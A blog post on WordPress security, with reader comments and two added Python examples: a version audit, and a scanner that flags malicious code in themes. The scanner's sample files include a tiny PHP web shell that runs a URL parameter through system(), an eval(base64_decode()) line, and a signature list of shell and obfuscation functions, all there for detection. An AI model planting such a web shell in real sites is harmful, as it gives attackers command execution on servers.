The article How did WordPress win? has certainly been making the rounds over the last two days, but all eyes seem to be (for the most part) on this comment by core developer Mark Jaquith, who sums up the state of WordPress security quite well. It is hard to avoid quoting the entire thing here, but here are a few key points:
I haven’t seen an up-to-date WordPress install get directly exploited in around five years. Seriously. Every time I investigate a compromised WordPress install, it is either because they were running an old version (usually not just a little bit old, but really old), or because their web host was compromised.
[…]
When you’re paying $5 a month for hosting, three things will usually suffer: Stability, Security, and Support.
[…]
Two big priorities right now are: (a) making it super easy to stay up-to-date and (b) pushing web hosts to get their act together.
To summarize the major points of the comment: your WordPress installation is safe as long as it is up to date (and your password is good); the developers are working on ways to make staying up to date easier; and you should make sure that your hosting provider isn't taking shortcuts with its own security.
As a gentle reminder after reading this article, WordPress 3.0.5 and 3.1-RC4 were released a few days ago, so don’t forget to update your installation!
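The point of the post is that an out-of-date core is what actually gets WordPress sites compromised, and several commenters below run ten or more installs. The following is an added example, not code from the original post or from WordPress itself: it reads the `$wp_version` string from each install's `wp-includes/version.php` (the real location of that variable), compares it with a release you name, and flags installs that are behind or running a release candidate. The three install contents are constructed samples, and the "current stable" value is taken from the post's reminder above.

```python
import re
from pathlib import Path
from typing import Dict, Optional, Tuple

# Constructed samples: the contents of wp-includes/version.php from three
# hypothetical installs (paths and versions are made up for the example).
SAMPLE_INSTALLS: Dict[str, str] = {
    "/var/www/blog-a": "<?php\n$wp_version = '3.0.5';\n$wp_db_version = 15260;\n",
    "/var/www/blog-b": "<?php\n$wp_version = '2.9.2';\n",
    "/var/www/blog-c": "<?php\n$wp_version = '3.1-RC4';\n",
}

# The release the post tells readers to be on at the time of writing.
CURRENT_STABLE = "3.0.5"

# WordPress declares its version as: $wp_version = '3.0.5';
VERSION_RE = re.compile(r"^\$wp_version\s*=\s*'([^']+)'\s*;", re.M)


def parse_wp_version(version_php: str) -> Optional[str]:
    """Return the version string declared in a version.php source, or None."""
    m = VERSION_RE.search(version_php)
    return m.group(1) if m else None


def version_key(v: str) -> Tuple[Tuple[int, ...], int, str]:
    """Sort key: numeric components, then whether it is a final release.

    '3.1-RC4' splits into base (3, 1, 0) and pre-release tag 'RC4'; a
    pre-release sorts before the final release with the same base.
    Raises ValueError on a base that is not dotted integers.
    """
    base, _, pre = v.partition("-")
    nums = tuple(int(x) for x in base.split("."))
    nums = nums + (0,) * (3 - len(nums))  # pad so 3.1 == 3.1.0
    return (nums, 0 if pre else 1, pre)


def is_outdated(installed: str, latest: str) -> bool:
    return version_key(installed) < version_key(latest)


def audit(installs: Dict[str, str], latest: str) -> Dict[str, str]:
    """Map each install root to a status string relative to `latest`."""
    report: Dict[str, str] = {}
    for root, src in installs.items():
        v = parse_wp_version(src)
        if v is None:
            report[root] = "unknown (no $wp_version found)"
            continue
        try:
            outdated = is_outdated(v, latest)
        except ValueError:
            report[root] = f"unknown (unparseable version {v!r})"
            continue
        if outdated:
            report[root] = f"outdated ({v} < {latest})"
        elif "-" in v:
            # Ahead of stable but a release candidate: not a supported release.
            report[root] = f"pre-release ({v})"
        else:
            report[root] = f"current ({v})"
    return report


def read_installs(roots) -> Dict[str, str]:
    """Read wp-includes/version.php from real install roots on disk."""
    out: Dict[str, str] = {}
    for root in roots:
        path = Path(root) / "wp-includes" / "version.php"
        out[str(root)] = path.read_text(encoding="utf-8", errors="replace") if path.exists() else ""
    return out


if __name__ == "__main__":
    # Swap SAMPLE_INSTALLS for read_installs([...]) to audit real installs.
    for root, status in audit(SAMPLE_INSTALLS, CURRENT_STABLE).items():
        print(f"{root}: {status}")
```

Run it from cron and you get a one-line-per-site inventory instead of logging into ten dashboards; the `latest` value still has to come from the WordPress release announcements, since this example deliberately makes no network calls.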
I agree, my WordPress installation is safe as long as it’s up to date. And luckily, the WordPress team reacts promptly to any security issue by releasing a new version. What bothers me though is the multitude of so-called ‘free’ themes and plugins on the web. Many of them contain malicious code. This, coupled with the fact that WordPress is one of the easiest systems to install themes and plugins on, could bring a lot of trouble.
People with hardly any knowledge about MySQL, PHP and their exploits can set up their system within 5 minutes. When they cannot find a suitable theme on the WordPress.org site, another one is easily found via Google. There goes your secure system, and with it your perception of WordPress security overall. Would a novice user know about handy plugins like exploit-scanner? I think not. Wouldn’t it be great if such functionality were available in WordPress core? Or shouldn’t there at least be some kind of warning when a suspicious theme or plugin is installed? A check whether the plugin or theme is hosted on WordPress.org could be a first step.
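The commenter above asks for a warning when a suspicious theme is installed and points at the exploit-scanner plugin. As an added illustration, not part of the original post and not the exploit-scanner plugin's own code, here is the core of such a check: a signature scan over the PHP files of a theme or plugin for the obfuscation and execution patterns that injected payloads in "free" themes typically rely on (`eval(base64_decode(...))`, shell execution functions, remote includes, hidden markup). The theme files are constructed samples; the base64 blob is an opaque stand-in for a payload.

```python
import re
from pathlib import Path
from typing import Dict, List, NamedTuple, Tuple

# Constructed samples: one clean theme file and two files carrying the kind
# of code that turns up in themes downloaded from outside wordpress.org.
SAMPLE_FILES: Dict[str, str] = {
    "clean-theme/functions.php": (
        "<?php\n"
        "function clean_theme_setup() {\n"
        "  add_theme_support('post-thumbnails');\n"
        "}\n"
        "add_action('after_setup_theme', 'clean_theme_setup');\n"
    ),
    "free-theme/footer.php": (
        "<?php\n"
        "// theme credits\n"
        "echo \"<div id='footer'>\";\n"
        "eval(base64_decode('aGlkZGVuIGxpbmsgcGF5bG9hZA=='));\n"  # opaque stand-in payload
        "?>\n</div>\n"
    ),
    "free-theme/inc/helper.php": (
        "<?php\n"
        "$f = $_GET['f'];\n"
        "@system($f);\n"
    ),
}


class Finding(NamedTuple):
    lineno: int
    signature: str
    severity: str


# (name, compiled regex, severity). Order matters only for readability.
SIGNATURES: List[Tuple[str, "re.Pattern[str]", str]] = [
    ("eval_of_decoded_payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("), "high"),
    ("shell_exec_family",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("), "high"),
    ("remote_include",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://"), "high"),
    ("eval", re.compile(r"\beval\s*\("), "medium"),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\("), "medium"),
    ("gzinflate", re.compile(r"\bgzinflate\s*\("), "medium"),
    ("hidden_markup", re.compile(r"style\s*=\s*['\"][^'\"]*display\s*:\s*none"), "low"),
]

SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3}


def scan_source(source: str) -> List[Finding]:
    """Return every signature hit in a PHP source, one Finding per (line, signature)."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, regex, severity in SIGNATURES:
            if regex.search(line):
                findings.append(Finding(lineno, name, severity))
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    return {name: scan_source(src) for name, src in files.items()}


def scan_directory(root: Path) -> Dict[str, List[Finding]]:
    """Scan every .php file under a real theme or plugin directory."""
    files = {str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="replace")
             for p in root.rglob("*.php")}
    return scan_files(files)


def worst_severity(findings: List[Finding]) -> str:
    worst = "none"
    for f in findings:
        if SEVERITY_RANK[f.severity] > SEVERITY_RANK[worst]:
            worst = f.severity
    return worst


if __name__ == "__main__":
    # Replace SAMPLE_FILES with scan_directory(Path("wp-content/themes/x")) for a real theme.
    for name, findings in scan_files(SAMPLE_FILES).items():
        print(f"{name}: {worst_severity(findings)}")
        for f in findings:
            print(f"  line {f.lineno}: {f.signature} [{f.severity}]")
```

Treat the output as a triage list, not a verdict: legitimate plugins do call `base64_decode` (embedded images, API payloads), so the medium findings need a human to read the line, while a `high` hit in a footer or a file named like a helper is almost always what the commenter describes. The scan also says nothing about where the theme came from; checking that it is the wordpress.org copy is a separate step.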
I was paying $20/month to a host that got me hacked twice (this host is on the WP recommended list of hosts page, so I’m not sure why they’re there unless there is $ involved – this host was called out for widespread compromises last year). I keep my installs up-to-date immediately and sometimes via the beta plugin.
So, the $5/month comment isn’t necessarily accurate. $20/month did me far more damage than an $8/month account I’ve had for years.
BB
Let me guess … Media Temple?
For the price you pay, Media Temple’s Grid Hosting (gs) service has got to be the worst I’ve ever experienced. With all the support they seem to give to the community, I don’t know why everyone seems to give them a pass on their horrible (GS) hosting service.
MT’s GS is far from perfect. But to be fair, I’ve had all my WP sites on a GS plan for many years, and the only time I’ve been hacked was when someone using a WP site on my space didn’t upgrade for several 2.x versions. Since then I upgrade them all myself and security hasn’t been an issue.
Security issues aside (http://digwp.com/2010/07/media.....ress-hack/), I’m glad to be off of Media Temple’s GS from a performance standpoint.
This is great to hear. My one concern with using WordPress was that security could be an issue, we have taken the proper precautions. We just finished our new website with WordPress last week and are very pleased. I am glad to hear such great reviews on the security updates. I recommend WordPress with the highest regard.
It’s great that Mark chipped into that debate with the facts. But I was also caught by this comment, specifically the criticism of the recent spate of security fixes for 3.0.
I have no time for people overstating WordPress’s security flaws just because they want to have a go at a giant and look big. And, in the end, I will err on the side of trusting the WP core developers, accepting that sh*t happens, and 3.0.2, 3.0.3, 3.0.4 and 3.0.5 happening in the space of a couple of months is just one of those things.
But like anyone who manages a number of WP sites, I wonder. Fingers crossed that this was “one of those things”, and that future releases will make keeping up-to-date easier.
Bottom line for now: WP is totally safe if you keep updated and only use wordpress.org themes and plugins!
Easy to secure or not, WordPress might have been winning, but it is on my loser list now. I no longer suggest WordPress to friends or clients. I have spent so much time doing updates for core and plugins that I have nightmares of CuteFTP Pro re-writing wp-this and wp-that. Not all web hosts are set up to work properly with the auto-update feature, and all these updates are killing my productivity.
I ask one more time, PLEASE stop coming out with new features!
I want a secure base version of WP – call it 3.1.2 Freeze. A secure version of WP that I can leave alone and not update at all. Something that will let me blog for 6 months without having to update the core and the plugins.
If core developers want to add some new features, release some plugins. I want to see WP V 3.2 and 3.3 become optional upgrades. I want news that says “whoops! security flaw in 3.3.1 – you must update all your blogs to 3.3.2, unless you are running the 3.1.2 freeze version, which is not affected by our lack of securing the feature creep.”
How many updates has Joomla had the past few years? Maybe that would save a lot of time.
Fantastic idea.
Love the “feature creep” terminology. Introduction of something new can break something somewhere else so it’s a never ending cycle of security updates/patches.
I really wish that the WP Team would focus on security first, rather than the multitude of “features” and toys that come with the major releases. Security seems like it’s always last on the list because it isn’t sexy.
David,
I do believe that they do focus on security first, quite heavily in fact.
Case in point would be right now. They are busting their asses trying to release the much overdue 3.1 version, but are still pushing out regular .0x security releases.
If security was a second rate issue for them, why would they bother?
Cheers
Ben
I think the fact that you’re looking for something that won’t need updating at all is kind of unrealistic. Pretty much all of the blogging/CMS software I’ve come across has had updates, even if it was once in a while.
Why do you think it is not realistic? Couldn’t someone take WP 2.9.2 and strip the xmlrpc and say this is secure, do not upgrade it and you should be fine? Maybe give me WP 1.5 and say if you don’t need the new fancy features you can leave that?
All it would take is for someone to establish a WP that is secure and call it a freeze version. Then any time a security flaw is found, someone checks to see if it affects only the newer version, or if it is retroactive as well.
The message in the dashboard would say “you are using WP freeze and it is still secure” – there are optional updates if you want the latest features.
Of course plugins would have to have a listing saying if they work with the freeze version, or if they require the latest WP – but for a dozen of my blog sites, I would never need the newest plugins. I just need a basic blog, not a thousand updates for WP and a couple of plugins.
Certainly there will be WP sites that take advantage of the newest features that have crept in, but I wonder out of a million downloads, how many people use taxonomies? I love the feature and have some use for it on a couple of my blogs, but most of the blogs I update will never need the new features.
There’s the problem with your “Freeze Version” idea. The exploiters are ever coming up with new ways to do their mischief. Even a “Freeze Version” would likely need to be upgraded from time to time due to new exploit techniques.
You end up in the same place.
Instead why not offer updating & maintenance packages for security purposes (not to mention integration of new features) as a value added service for your clients? That equals more revenue for your business!
“Instead why not offer updating & maintenance packages for security purposes (not to mention integration of new features) as a value added service for your clients?”
Most of my clients are family and friends that don’t have the money to pay a web designer, or pay me for doing upgrades (I have actually brought this up before) – many of the people using WP are not well off, hence the appeal of free blogging software.
Some people also use WP to serve mainly static pages, only updating a few times year. If I charged for every WP and plugin upgrade, it would be cheaper for them to just pay a designer to add pages to a static site.
An upgrade from time to time, like a couple of times a year, is many times better than the 20 or so updates a year we are doing now, and add the plugin updates into the mix.. and theme updates when core changes cause mischief. Really makes Joomla and regular static HTML publishing cost about the same.
With a WP freeze version, I could still tell everyone how they can build their own web sites with really great free software. With constant upgrades it becomes more work for features that are not needed. It also leaves other sites that are on shared servers in danger of issues caused by someone else who does not check on WP updates on a daily basis.
Most WP users only use a few plugins, I’m sure most of my bloggers wouldn’t mind being stuck with a freeze version of wp-cache or allinoneso. They’d much rather have that, than to have to upgrade a dozen times just to have a few new bells and whistles.
@Steve, very good point about the fact that many WP users aren’t well off. A huge part of why I moved from working with larger CMSs to WP was so I could exploit my professional skills to help out friends doing worthy projects for little to no money. Obviously, reducing the number of upgrades required for these kinds of sites would be great.
However, even though I’m a bit miffed at the recent spate, your “20 or so updates a year” is a wild exaggeration. http://wordpress.org/news/category/releases/ indicates 7 updates in 2010, 8 in 2009, 7 in 2008, etc.
On top of that, there wasn’t really a need to go for all of them. I don’t think 3.0 included any security fixes; and not all of the 3.0.x releases applied to every kind of installation (it certainly sounds like a lot of your sites didn’t require many, if any, of them, if you read about what the fixed vulnerabilities actually are). I’d say maybe 3-4 essential updates in 2010 for a basic WP site.
Plugins are a different issue. Generally, plugin upgrades are feature releases, so you can ignore them if you want. But who has time to read the release notes for every plugin upgrade on all their WP sites? A really nifty plugin would be one that alerted you (via email or in WP) when there’s a plugin on your site that has a security fix in a new version. Maybe the plugin repository could include some kind of standardized mechanism to flag security fixes?
Anyway, WP is more popular and more complex now. It’s different. Perhaps it’s getting to the stage where it’s no longer suitable for some very basic sites. If it takes as little or less time to do a site in flat HTML as in WP, I don’t see a problem with WP – just do the site in flat HTML 😉
Really? *You* have to do the updates? The users can’t click the one check-box and then click the update button?
I’ve used WordPress since the great MoveableType license debacle and, frankly, one of the best features they added was the simplified update. It took me a while to actually use it though, because like you seem to, I fear change. No, seriously, I’m afraid of technological changes in things that I use on a daily basis because I know that one small change can mean disaster for me. I know because I make my living from that simple fact. I am an entire IT Department these days and I don’t have time or patience to screw around with tedious updates on my personal time. The WordPress auto-update feature cuts down on that in huge ways.
Also, as someone else pointed out, thanks to security updates, a “freeze” version is virtually impossible. Even Windows and Linux and OS X have security updates to their “stable” versions.
I think it’s important to have reasonable expectations in regards to updates. I don’t always like the additional features they add during updates either, but, sometimes, those changes open up new possibilities for managing a website or blog that I had never even considered.
So, embrace the philosophy of Herodotus, “All is flux, nothing stays still.” Change is the only constant in the Universe. It’s science!
I agree, and I frequently remind myself that “everything is temporary”. The auto update is very nice, we love it – unfortunately it does not work on two of our webservers, even if given the FTP credentials; it fails on one of our servers, and leaves my blogger with a “maintenance mode” notice, even when going to dotcom/wp-admin – so as nice as it is for several of our sites, it is actually quite a hindrance on our other two servers.
I love WP, and do not mind doing updates on sites that actually get new content added on a regular basis. I spent a good amount of time convincing friends and family that they should use it to build their own web sites easily, with the ability to edit pages themselves, it saves time and money. I have made pages and presentation showing people how they can save time and money by using WP to create even simple static sites.
With all of the great themes and customization options it is a great choice. But for one friend who used WP and a nice theme for her pet sitting side project, she loves the look of the theme, but she has had no need to add content to the site in the past two years. It’s a great example of using WP for a web site, using static pages that looks like a web site, and not like a blog. She has no need to edit pages and add content, but we have needed to upgrade the WP many times, as everyone is unsure if an update provides a security patch for previous versions.
As mentioned earlier, it just may be time to go back to the static HTML sites for many people, as things have changed to make WP more robust, and more work. If someone would come out and say running 2.8.6 is fine, with no need to ever update, that would be great, that is all we need. If I had just made some sites in static HTML instead of convincing people about the power of WP, then I would have saved everyone a lot of time, so it may be my WP 2011 resolution to convert sites that are not being used as blogs into static HTML, that way I won’t be bothered to update them, or any plugins, all year.
I will still wish we had a freeze version, even if it was version 2.5 – something we could be sure was stable and secure, without bells and whistles that at this point are becoming time intensive to keep up with. Then I could suggest people use that for simple web sites.
I wonder how many WP sites are live online today that are not 3.0.5? Couldn’t Automattic release new features as optional plugins throughout the year and only do a major core update two times a year? Or it doesn’t matter I guess; in the time it has taken me to write these replies here, I could have copied a couple of sites’ pages and made them static HTML.
@steve_taylor – thanks for pointing that out, 7 updates is better than 20 – it just seemed like a lot this past year, I am guessing all the theme updates and plugin updates have made it seem worse, and perhaps those have eaten up as much time as the WP updates.. although doing them through FTP, where you wait for the server to delete all the wp-admin and wp-includes files, then uploading all the core files, does take a while when doing many WP sites.. I used to make backups (through WP export, and phpMyAdmin, and through FTP) too – but not in 2010 – too much work.
Ah, I must have missed where you mentioned that some of your servers were having problems with the autoupdate feature. Might be worth taking up with the provider as I’m almost certain it’s a configuration problem at their end. I’ve been on quite a few webhosts, both for my own sites and for other folks, and I’ve never had an issue. Honestly, the autoupdate feature is probably the single best feature since 2.5, for me. It’s ironic that I was terrified of it when it was announced and now I can’t imagine how I’d live without it!
Of course, as much as I love WordPress, it’s not a cure-all. There are just some sites that don’t need it. A static site that doesn’t get new or updated information added to it on a regular basis probably doesn’t actually *need* WP. I think that’d be a case of the “right tool for the right job” and sticking with some basic, static HTML or PHP. WordPress would be overkill and, as you point out, a maintenance nightmare for little to no return.
Unless there was a non-obvious reason to go with something more complicated.
In any case, I think regular updates are part of *all* software packages these days, no matter what we want. It’s the way of the world, I’m afraid.
When they cannot find a suitable theme on the WordPress.org site, another one is easily found via Google. There goes your secure system, and with it your perception of WordPress security overall.
Thankfully, hackers are idiots. The ones smart enough to find the security holes are not dumb enough to resort to hacking.
I almost ended up in an argument a month or so ago when a Rails developer I know insisted that WordPress was constantly being hacked. He said he knew this because he always read about it via news sources. He seemed surprised when I said I had never heard of a WordPress install getting hacked because of a WordPress security issue. I’m not sure whether he believed me that WordPress has been very secure over the years, but either way, such opinions are both common and disappointing.
WordPress has had a security PR issue for a while now. I’m not sure there is any solution to it though, other than for the likes of Mark Jaquith to keep reiterating how rare it is for WordPress itself to be compromised.
From what I can tell, there is only one downside to WordPress, but sadly it’s a major one – Matt Mullenweg. This guy is a self obsessed totalitarian with holier than thou attitude which forces everyone who works for him to kiss his ass to a point of eternal shame. Everyone behind WP is on their feet when the name of Matt Mullenweg is brought up and scared shitless to let any criticism of him get pass. WP would have been a solid platform if it weren’t for this man’s obsession with himself. Progress and common sense are hence sacrificed for things that please this man’s ego.
Quoting what I said there:
Why would anyone build for an OS other than Windows? When you answer that question, you’ll have an answer for your question about WordPress.
I would recommend WordPress; never had any problems with it and our clients have never had any issues picking up how to update the site themselves.
I would like to chime in and say that in 2011, in the world of free and open source software, implying that $5 hosting is not secure is one of the worst things one can perpetuate. Hardware costs can be high of course. But safe can be cheap, and in fact it is cheap; often it is free! It is the support and knowledge of the hosting company that matters.
As long as we regularly update our WP, the possibility of our sites being hacked is minimized. Also, installing a security plugin will add to our site’s security.
It’s Monday 2/14 and there is no new mandatory WP security update to install! That’s a hundred+ sites that can rest easy for another week…
Don’t get me wrong, I like WP security. But four or five mandatory updates in less than two months causes a lot of busy work. Not to mention the inevitable plug-in updates to follow. And, the beta in process.
Happy Valentine Day, All!
Wow, never knew hosting was related to security – I always figured it would be the password & username settings. Do you have any sites you recommend/don’t recommend hosting with?
Never had a problem with security on any of my sites. I keep them up to date mostly because I hate seeing the notice(s) to do it. That is the whole idea behind them, I guess. I have to do the .5, but I have 10 sites and each I have to do manually. Need time to do it in one evening.
Great article James!